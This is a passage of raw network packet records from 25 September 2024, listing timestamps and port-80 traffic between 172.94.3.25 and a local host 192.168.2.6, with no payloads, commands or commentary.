                        Sep 25, 2024 16:03:38.059838057 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.059876919 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.059887886 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.059897900 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.059992075 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.060332060 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.060344934 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.060369968 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.060376883 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.060380936 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.060394049 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.060405016 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.060417891 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.060429096 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.060437918 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.060462952 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.060503006 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.060513973 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.060525894 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.060543060 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.108798027 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.138123035 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.138139963 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.138149977 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.138164043 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.138175011 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.138187885 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.138360977 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.138380051 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.138386965 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.138396025 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.138410091 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.138425112 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.138449907 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.138510942 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.138521910 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.138534069 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.138555050 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.138573885 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.216211081 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.216228008 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.216295958 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.216308117 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.216320038 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.216335058 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.216356039 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.216367006 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.216411114 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.216415882 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.216423988 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.216434002 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.216440916 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.216470957 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.216511011 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.216521025 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.216547966 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.216557980 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.216567993 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.216578960 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.216593981 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.216603994 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.216614962 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.216631889 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.216636896 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.216664076 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.294452906 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.294625998 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.294639111 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.294651031 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.294661999 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.294673920 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.294687033 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.294699907 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.294701099 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.294737101 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.294790030 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.294874907 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.294887066 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.294898033 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.294915915 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.294926882 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.294936895 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.294966936 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.375272036 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.375297070 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.375309944 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.375320911 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.375334024 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.375339985 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.375365019 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.375432014 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.375463009 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.375499964 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.375509977 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.375521898 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.375544071 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.375549078 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.375580072 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.375673056 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.375850916 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.375861883 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.375870943 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.375883102 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.375884056 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.375894070 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.375902891 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.375933886 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.382690907 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.382705927 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.382745028 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.453669071 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.453687906 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.453701019 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.453713894 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.453732014 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.453840017 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.453891993 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.453931093 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.453948975 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.453984976 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.453996897 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.454008102 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.454034090 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.454034090 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.454138994 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.454149961 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.454161882 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.454195976 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.454200983 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.454200983 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.454207897 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.454221010 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.454256058 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.454256058 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.531548023 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.531575918 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.531588078 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.531661034 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.531687021 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.531697035 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.531759977 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.531795025 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.531795025 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.531888008 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.531972885 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.531992912 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.532005072 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.532032013 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.532078981 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.532089949 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.532100916 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.532123089 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.532123089 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.532186031 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.532195091 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.532206059 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.532218933 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.532229900 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.532241106 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.532241106 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.532423973 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.541965008 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.542057037 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.542102098 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.610013962 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.610033989 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.610047102 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.610059977 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.610111952 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.610121965 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.610124111 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.610137939 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.610388041 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.610565901 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.610577106 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.610590935 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.610601902 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.610613108 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.610656023 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.610691071 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.610691071 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.610761881 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.610773087 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.610785007 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.610819101 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.610852957 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.610899925 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.610910892 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.610918045 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.611032963 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.619983912 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.620373964 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.620433092 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.688333988 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.688379049 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.688390970 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.688400984 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.688416004 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.688426971 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.688435078 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.688477039 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.688488007 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.688499928 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.688527107 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.688536882 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.688652039 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.688683987 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.688689947 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.688700914 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.688711882 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.688725948 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.688735008 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.688756943 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.688756943 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.688769102 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.688806057 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.688827038 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.688888073 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.688921928 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.688946009 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.688956022 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.688968897 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.688981056 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.689027071 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.689027071 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:38.698482990 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.698518991 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:38.698570013 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.599251032 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.599272966 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.599286079 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.599400997 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.599910021 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.599952936 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.599994898 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.600007057 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.600018024 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.600030899 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.600040913 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.600043058 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.600059986 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.600127935 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.600138903 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.600151062 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.600161076 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.600162983 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.600174904 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.600178003 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.600188017 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.600205898 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.639878988 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.677237034 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.677278042 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.677289009 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.677300930 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.677335024 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.677362919 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.677541018 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.677618027 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.677628994 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.677640915 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.677653074 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.677669048 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.677689075 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.677767992 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.677778959 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.677794933 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.677800894 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.677807093 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.677818060 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.677829981 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.677829981 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.677861929 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.677922964 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.677933931 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.677946091 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.677957058 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.677970886 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.678000927 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.678011894 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.678023100 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.678044081 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.717989922 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.755462885 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.755480051 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.755491972 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.755543947 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.755628109 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.755639076 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.755656958 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.755666018 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.755667925 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.755681038 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.755696058 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.755718946 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.755731106 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.755742073 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.755774975 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.755815983 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.755817890 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.755826950 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.755847931 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.755860090 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.755888939 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.755964041 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.756027937 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.756038904 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.756048918 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.756072044 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.756097078 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.756165028 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.756176949 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.756182909 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:40.756233931 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:40.796148062 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:41.013765097 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.013792992 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.013813972 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.013828039 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.013839960 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.013851881 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.013870001 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.013880968 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.013892889 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.013899088 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:41.013904095 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.013916969 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.013931990 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.013942957 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.013955116 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.013967037 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:41.013967037 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.013978958 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.013991117 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:41.013992071 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.014002085 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.014017105 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:41.014034986 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:41.014094114 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.014132023 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:41.014312983 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.014332056 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.014343977 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.014363050 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:41.014364958 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.014377117 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.014386892 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:41.014400005 CEST4971580192.168.2.6172.94.3.25
